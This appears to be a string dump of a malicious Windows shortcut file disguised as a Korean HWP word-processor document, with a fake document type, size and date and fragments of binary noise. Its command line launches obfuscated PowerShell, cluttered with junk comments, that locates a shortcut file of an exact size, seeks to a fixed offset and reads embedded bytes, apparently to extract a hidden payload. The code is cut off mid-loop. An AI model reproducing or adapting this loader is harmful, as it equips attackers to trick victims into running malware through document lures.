Windows
System32
cmd.exe
C:\Windows\System32\cmd.exe
%windir%\System32\cmd.exe
=gIDATx^
xzzRJ)
mEj_?fi
\wd9SvR/:
~yI?O_
ZK}{;z
(P/Uo4
~ydiLf
W{;oNa
GI=loi
`HeHdH
HWP Document File
*`*iw`*iw
/>Wy<"
Zq[0c@
f|0Z$L
-xfZ[c
Windows
System32
bcmd.exe
EType: HWP 2022 Document
Size: 27 KB
Date modified: 05/23/2024 14:51
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$maybe=0;<#JoB RBSD#>$stormy=Get-ChildItem *.lnk;<#wZa ayet#>$stormy=$stormy|<#MCi JjUy#>where-object{$_.length -eq 0x000880ED};<#KqL hWRg#>$beat=$stormy;<#eIf DlNd#>$stormy=$stormy|<#Vmj JbzB#>Select-Object -ExpandProperty Name;<#TRE EPHd#>if($stormy.length -eq 0){$maybe=1;<#wPL TCwU#>$stormy=Get-ChildItem -Path $env:TEMP -Recurse -Filter *.lnk|<#IOX VnSL#>where-object{$_.length -eq 0x000880ED}|<#ZnO OGcu#>ForEach-Object{$_.FullName}|<#nwF TQEw#>Select-Object -First 1;<#OYo KmBu#>$beat=$stormy};<#oqA vqBc#>$complete=$stormy.substring(0,$stormy.length-4);<#prM umrS#>$group=[System.IO.BinaryReader]::new([System.IO.File]::open($stormy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read));<#DKL khBc#>try{$group.BaseStream.Seek(0x000014ED,[System.IO.SeekOrigin]::Begin);<#VhW OmTW#>$mouse=$group.ReadBytes(0x00006C00);<#evd tjKM#>}finally{$group.Close()};<#kxK ZKNG#>for($fa
%windir%\System32\cmd.exe
Root Entry
Root Entry
FileHeader
DocInfo
HwpSummaryInformation
BodyText
PrvImage
PrvText
DocOptions
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
<><><><><>
<><><><><>
<><><><><>
<><><><><>
<><><><><>
<><><><><> >
>< (
Section0
11:21:49
10, 0, 0, 5060 WIN32LEWindows_8
:\Users\Bay\AppData\Local\Temp\prv0000370009e6.png
Sectio